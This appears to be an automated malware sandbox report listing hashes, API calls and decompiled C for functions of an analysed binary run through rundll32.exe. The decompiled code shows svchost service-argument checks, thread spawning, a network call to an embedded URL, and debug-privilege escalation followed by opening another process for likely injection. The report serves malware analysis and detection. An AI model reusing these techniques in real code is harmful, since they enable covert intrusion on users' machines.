                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                                    • String ID: D
                                                                                    • API String ID: 3798668922-2746444292
                                                                                    • Opcode ID: bd8a923999b9991710b115b99d01daf65809e1e9577aad379d7a6708e8adf6d8
                                                                                    • Instruction ID: 4eb0c59f4803b7506f5ff6830a9c1deb5937146a7a7730e05c7aa181d319c706
                                                                                    • Opcode Fuzzy Hash: bd8a923999b9991710b115b99d01daf65809e1e9577aad379d7a6708e8adf6d8
                                                                                    • Instruction Fuzzy Hash: 1C1182B1604608AFD704EBA5DC92FEE77EDEF08304F91007AF605E7281E6745E448758
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00435600, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(>YC), ref: 00435610
                                                                                      • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AllocInitStringVariant
                                                                                    • String ID: >YC$cYC
                                                                                    • API String ID: 4010818693-2962211312
                                                                                    • Opcode ID: 95145bfc45b7620ee9ddcdd8df841c505c76c4f986ac1c97678f8ad24fa23931
                                                                                    • Instruction ID: 5a220649ebee1d9f27268bcd1ac9fa6249c44259e217bc11eddfa162a287c46a
                                                                                    • Opcode Fuzzy Hash: 95145bfc45b7620ee9ddcdd8df841c505c76c4f986ac1c97678f8ad24fa23931
                                                                                    • Instruction Fuzzy Hash: A8F08170700604AFD700EB95CD42E9EB7FCEB8D700FA04576F204E3291DA346E048669
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006B7568, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006AB828: FreeLibrary.KERNEL32(00000000,006B7594,00000000,006B75A3,?,?,?,?,?,006B8087), ref: 006AB83E
                                                                                      • Part of subcall function 006AB518: GetTickCount.KERNEL32 ref: 006AB560
                                                                                      • Part of subcall function 00614EC0: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 00614EDF
                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B8087), ref: 006B75BD
                                                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B8087), ref: 006B75C3
                                                                                    Strings
                                                                                    • Detected restart. Removing temporary directory., xrefs: 006B7577
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                    • String ID: Detected restart. Removing temporary directory.
                                                                                    • API String ID: 1717587489-3199836293
                                                                                    • Opcode ID: 9d8c6a5e71bce1eaabc020f983e6a3b3e943ad5cbfd447bc04c93601dbcaea22
                                                                                    • Instruction ID: eb50edc141b176b4c4c2d30214ac255ec0ff1137937d64bc1826d6109f125fe4
                                                                                    • Opcode Fuzzy Hash: 9d8c6a5e71bce1eaabc020f983e6a3b3e943ad5cbfd447bc04c93601dbcaea22
                                                                                    • Instruction Fuzzy Hash: FAE02BF260C6042ED3613BB5BC02DE67F9FEBC7364751043AF40482902CD1968C18778
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C750C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C759C: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C751A,?,?,?,006B66A5,0000000A,00000002,00000001,00000031,00000000,006B68D5), ref: 005C75AA
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B66A5,0000000A,00000002,00000001,00000031,00000000,006B68D5,?,00000000,006B69A2), ref: 005C7524
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                    • API String ID: 1883125708-2866557904
                                                                                    • Opcode ID: efebfd98173b0eafe801dbdb02c234ba5fe6efea653fc4811e05af60f83a25fa
                                                                                    • Instruction ID: 7e2c108bb10f7f082d0db0eee0b4291c943f7f38440bc59f5173c01314d4ac5e
                                                                                    • Opcode Fuzzy Hash: efebfd98173b0eafe801dbdb02c234ba5fe6efea653fc4811e05af60f83a25fa
                                                                                    • Instruction Fuzzy Hash: 68E0C2B23482152FC20172FF2C85F6F4E8CEDCD75A310043EF605E2502E958CD0209AC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C6204, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060CFD8,00000000,0060D0AA,?,?,006D479C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C621E
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 1646373207-1816364905
                                                                                    • Opcode ID: 62b8e0f0a56936aa9a12e08c2800317b2c896f52e35f249fadc7c93598274ed8
                                                                                    • Instruction ID: c75d70e110fee00d4030cd3977e0a9c06a7ab18f3cb046c04c9789280543d232
                                                                                    • Opcode Fuzzy Hash: 62b8e0f0a56936aa9a12e08c2800317b2c896f52e35f249fadc7c93598274ed8
                                                                                    • Instruction Fuzzy Hash: 09E086B874070116DB2072FA5CC3F9B1A8B6BC4714F10443E7B54D62C6EDADDA8442DA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C73C0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C74B6,?,00000004,006CBEB0,00614DAA,00615224,00614CC8,00000000,00000B06,00000000,00000000), ref: 005C73D7
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                    • API String ID: 1646373207-2498399450
                                                                                    • Opcode ID: a04977c9df1766bfa9eb39965416b1cc808de74be9259f562920b096e4c3932b
                                                                                    • Instruction ID: c2b8af028828c778303b028511c4b48d7ee3342a6cedbc73199b4139695af62d
                                                                                    • Opcode Fuzzy Hash: a04977c9df1766bfa9eb39965416b1cc808de74be9259f562920b096e4c3932b
                                                                                    • Instruction Fuzzy Hash: C4E092B0619204DFDB05AB64EC85F853FD5E78D305F11281EF14092991CBB508D0CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C759C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C751A,?,?,?,006B66A5,0000000A,00000002,00000001,00000031,00000000,006B68D5), ref: 005C75AA
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                    • API String ID: 1646373207-260599015
                                                                                    • Opcode ID: 8390f49b65f4fec2f209d5efc8905e974ae146cd1b5ec0c6a84ab675bf547ecf
                                                                                    • Instruction ID: 4e3f113fda4c16e881a5f3aa9ecd558cba9a4971931a60422d60a81ddc808e35
                                                                                    • Opcode Fuzzy Hash: 8390f49b65f4fec2f209d5efc8905e974ae146cd1b5ec0c6a84ab675bf547ecf
                                                                                    • Instruction Fuzzy Hash: D7D0C7B23167171F551171FA3CD1FDB0E8C5A5D399314047AF600D2941D655CD4119A8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006B80BC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C36AE,00000001,00000000,006C36D4,?,?,000000EC,00000000), ref: 006B80C6
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                    • API String ID: 1646373207-834958232
                                                                                    • Opcode ID: 5cbe801bf7b381ca0378d38539efb860e368aea908294e06d9e36ba0bca127a5
                                                                                    • Instruction ID: b900b06cde22f286b5d6b80c7bf5c94766530aebccc61ebef0275fd01e3919ca
                                                                                    • Opcode Fuzzy Hash: 5cbe801bf7b381ca0378d38539efb860e368aea908294e06d9e36ba0bca127a5
                                                                                    • Instruction Fuzzy Hash: 50B092E02C130218182072B72C03ACA040F0994B8A70104553B10A3481DD5880C98339
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Analysis Process: rundll32.exe PID: 5336 Parent PID: 6292 rundll32.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 04ECC0A0, Relevance: 47.4, APIs: 22, Strings: 5, Instructions: 186threadnetworksynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E04ECC0A0(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				short _v528;
				long _v532;
				signed int _t15;
				int _t23;
				signed int _t24;
				void* _t26;
				void* _t28;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				void* _t75;
				signed int _t77;
				WCHAR* _t80;
				void* _t82;
				signed int _t83;
				void* _t84;
				signed int _t86;

				_t15 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t15 ^ _t86;
				_t80 = GetCommandLineW();
				GetModuleFileNameW(0,  &_v528, 0x104);
				_t23 = lstrcmpiW(E04EDD5EE( &_v528, 0x5c) + 2, L"svchost.exe"); // executed
				if(_t23 != 0) {
					_t24 = E04ECA980();
					__eflags = _t24;
					if(_t24 != 0) {
						E04ECBE90(__ebx, _t80, __edi, _t80); // executed
					} else {
						_t82 = CreateThread(0, 0, E04ECB280, 0, 0,  &_v532);
						WaitForSingleObject(_t82, 0xffffffff);
						CloseHandle(_t82);
					}
					_t26 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0); // executed
					_t75 = _t26;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L19;
					} else {
						_t28 = InternetOpenUrlW(_t75, 0x4f055fc, 0, 0, 0x80000000, 0);
						__eflags = _t28;
						if(_t28 != 0) {
							InternetCloseHandle(_t28);
							InternetCloseHandle(_t75);
							goto L19;
						} else {
							InternetCloseHandle(_t75);
							__eflags = _v8 ^ _t86;
							return E04ED572E(_v8 ^ _t86);
						}
					}
				} else {
					if(StrStrIW(_t80, L"netsvcs") == 0) {
						_t38 = StrStrIW(_t80, L"SystemNetworkService");
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = StrStrIW(_t80, L"AppService");
							if(__eflags == 0) {
								L19:
								__eflags = _v8 ^ _t86;
								return E04ED572E(_v8 ^ _t86);
							} else {
								_v532 = 0;
								_t77 = E04EC95F0(__ebx,  &_v532, StrStrIW, _t80, __eflags);
								__eflags = _t77;
								if(_t77 == 0) {
									goto L19;
								} else {
									_t83 = _v532;
									__eflags = _t83;
									if(_t83 == 0) {
										goto L19;
									} else {
										_t41 = E04ECB9A0(__ebx, _t77, _t83, _t77, _t83);
										__eflags = _t41;
										if(_t41 > 0) {
											goto L19;
										} else {
											_push(__ebx);
											do {
												Sleep(0x3e8);
												_t42 = E04ECB9A0(Sleep, _t77, _t83, _t77, _t83);
												__eflags = _t42;
											} while (_t42 <= 0);
											__eflags = _v8 ^ _t86;
											return E04ED572E(_v8 ^ _t86);
										}
									}
								}
							}
						} else {
							_t84 = CreateThread(0, 0, E04ECB280, 0, 0,  &_v532);
							WaitForSingleObject(_t84, 0xffffffff);
							CloseHandle(_t84);
							__eflags = _v8 ^ _t86;
							return E04ED572E(_v8 ^ _t86);
						}
					} else {
						CloseHandle(CreateThread(0, 0, E04ECA8C0, 0, 0, 0));
						CloseHandle(CreateThread(0, 0, E04EC9DC0, 0, 0,  &_v532));
						return E04ED572E(_v8 ^ _t86);
					}
				}
			}





















                                                                                    0x04ecc0a9
                                                                                    0x04ecc0b0
                                                                                    0x04ecc0bb
                                                                                    0x04ecc0cb
                                                                                    0x04ecc0eb
                                                                                    0x04ecc0f3
                                                                                    0x04ecc216
                                                                                    0x04ecc21b
                                                                                    0x04ecc21d
                                                                                    0x04ecc24f
                                                                                    0x04ecc21f
                                                                                    0x04ecc239
                                                                                    0x04ecc23e
                                                                                    0x04ecc245
                                                                                    0x04ecc245
                                                                                    0x04ecc261
                                                                                    0x04ecc267
                                                                                    0x04ecc269
                                                                                    0x04ecc26b
                                                                                    0x00000000
                                                                                    0x04ecc26d
                                                                                    0x04ecc27e
                                                                                    0x04ecc284
                                                                                    0x04ecc286
                                                                                    0x04ecc2a6
                                                                                    0x04ecc2a9
                                                                                    0x00000000
                                                                                    0x04ecc288
                                                                                    0x04ecc289
                                                                                    0x04ecc294
                                                                                    0x04ecc29e
                                                                                    0x04ecc29e
                                                                                    0x04ecc286
                                                                                    0x04ecc0f9
                                                                                    0x04ecc109
                                                                                    0x04ecc15a
                                                                                    0x04ecc15c
                                                                                    0x04ecc15e
                                                                                    0x04ecc1a4
                                                                                    0x04ecc1a6
                                                                                    0x04ecc2ab
                                                                                    0x04ecc2af
                                                                                    0x04ecc2ba
                                                                                    0x04ecc1ac
                                                                                    0x04ecc1b2
                                                                                    0x04ecc1c1
                                                                                    0x04ecc1c3
                                                                                    0x04ecc1c5
                                                                                    0x00000000
                                                                                    0x04ecc1cb
                                                                                    0x04ecc1cb
                                                                                    0x04ecc1d1
                                                                                    0x04ecc1d3
                                                                                    0x00000000
                                                                                    0x04ecc1d9
                                                                                    0x04ecc1dd
                                                                                    0x04ecc1e2
                                                                                    0x04ecc1e4
                                                                                    0x00000000
                                                                                    0x04ecc1ea
                                                                                    0x04ecc1ea
                                                                                    0x04ecc1f1
                                                                                    0x04ecc1f6
                                                                                    0x04ecc1fc
                                                                                    0x04ecc201
                                                                                    0x04ecc201
                                                                                    0x04ecc20b
                                                                                    0x04ecc215
                                                                                    0x04ecc215
                                                                                    0x04ecc1e4
                                                                                    0x04ecc1d3
                                                                                    0x04ecc1c5
                                                                                    0x04ecc160
                                                                                    0x04ecc17a
                                                                                    0x04ecc17f
                                                                                    0x04ecc186
                                                                                    0x04ecc191
                                                                                    0x04ecc19b
                                                                                    0x04ecc19b
                                                                                    0x04ecc10b
                                                                                    0x04ecc129
                                                                                    0x04ecc142
                                                                                    0x04ecc153
                                                                                    0x04ecc153
                                                                                    0x04ecc109

                                                                                    APIs
                                                                                    • GetCommandLineW.KERNEL32(00000001,00000000), ref: 04ECC0B5
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04ECC0CB
                                                                                    • lstrcmpiW.KERNEL32(-00000002,svchost.exe), ref: 04ECC0EB
                                                                                    • StrStrIW.SHLWAPI(00000000,netsvcs), ref: 04ECC105
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04ECA8C0,00000000,00000000,00000000), ref: 04ECC120
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECC129
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04EC9DC0,00000000,00000000,?), ref: 04ECC13F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECC142
                                                                                    • StrStrIW.SHLWAPI(00000000,SystemNetworkService), ref: 04ECC15A
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04ECB280,00000000,00000000,?), ref: 04ECC174
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04ECC17F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECC186
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04ECB280,00000000,00000000,?), ref: 04ECC233
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04ECC23E
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECC245
                                                                                    • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 04ECC261
                                                                                    • InternetOpenUrlW.WININET(00000000,04F055FC,00000000,00000000,80000000,00000000), ref: 04ECC27E
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 04ECC289
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CreateThread$Internet$ObjectOpenSingleWait$CommandFileLineModuleNamelstrcmpi
                                                                                    • String ID: AppService$Mozilla/4.0 (compatible)$SystemNetworkService$netsvcs$svchost.exe
                                                                                    • API String ID: 2591637205-553284339
                                                                                    • Opcode ID: a6f9bc82d9bbb387fb87d8ebf049f3e642d4f20b2fb01ddc504f8ffd2808dc32
                                                                                    • Instruction ID: 8b85882c598f52452c64ae6cb6e7c9234d90b236a488aa23b342e5ae57f3738c
                                                                                    • Opcode Fuzzy Hash: a6f9bc82d9bbb387fb87d8ebf049f3e642d4f20b2fb01ddc504f8ffd2808dc32
                                                                                    • Instruction Fuzzy Hash: 51513831B41308BBE724ABA5AD46FBE7369DFC4B15F201159FE09A71C0DEA4BD028B54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC8FD0, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 309libraryloadersynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 50%
                                                                                    			E04EC8FD0(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi, long _a4) {
				signed int _v8;
				char _v28;
				char _v32;
				long _v36;
				void* _v40;
				signed int _v44;
				void* _v48;
				void* _v52;
				void* _v92;
				signed int _t52;
				void* _t60;
				struct _SECURITY_ATTRIBUTES* _t68;
				_Unknown_base(*)()* _t70;
				_Unknown_base(*)()* _t72;
				void* _t73;
				_Unknown_base(*)()* _t81;
				signed int _t82;
				signed int _t83;
				void* _t84;
				signed int _t87;
				signed int _t89;
				void* _t93;
				long _t102;
				long _t104;
				signed int _t118;
				signed int _t127;
				signed int _t128;
				void* _t133;
				void* _t135;
				signed int _t136;
				long _t138;
				void* _t139;
				signed int _t142;
				signed int _t144;
				void* _t146;
				void* _t147;

				_t144 = (_t142 & 0xfffffff8) - 0x34;
				_t52 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t52 ^ _t144;
				_push(__ebx);
				_t104 = _a4;
				_push(__esi);
				_push(__edi);
				_t138 = __ecx;
				_v52 = __edx;
				_v32 = 0;
				if(GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege") == 0) {
					if(E04ECAA70(_t138) != 0) {
						goto L2;
					} else {
						goto L17;
					}
				} else {
					_t102 = RtlAdjustPrivilege(0x14, 1, 0,  &_v36); // executed
					if(_t102 < 0) {
						L17:
						return E04ED572E(_v8 ^ _t144);
					} else {
						L2:
						_t139 = OpenProcess(0x43a, 0, _t138);
						if(_t139 == 0) {
							goto L17;
						} else {
							_t60 = E04EC5920(); // executed
							if(_t60 == 0) {
								L18:
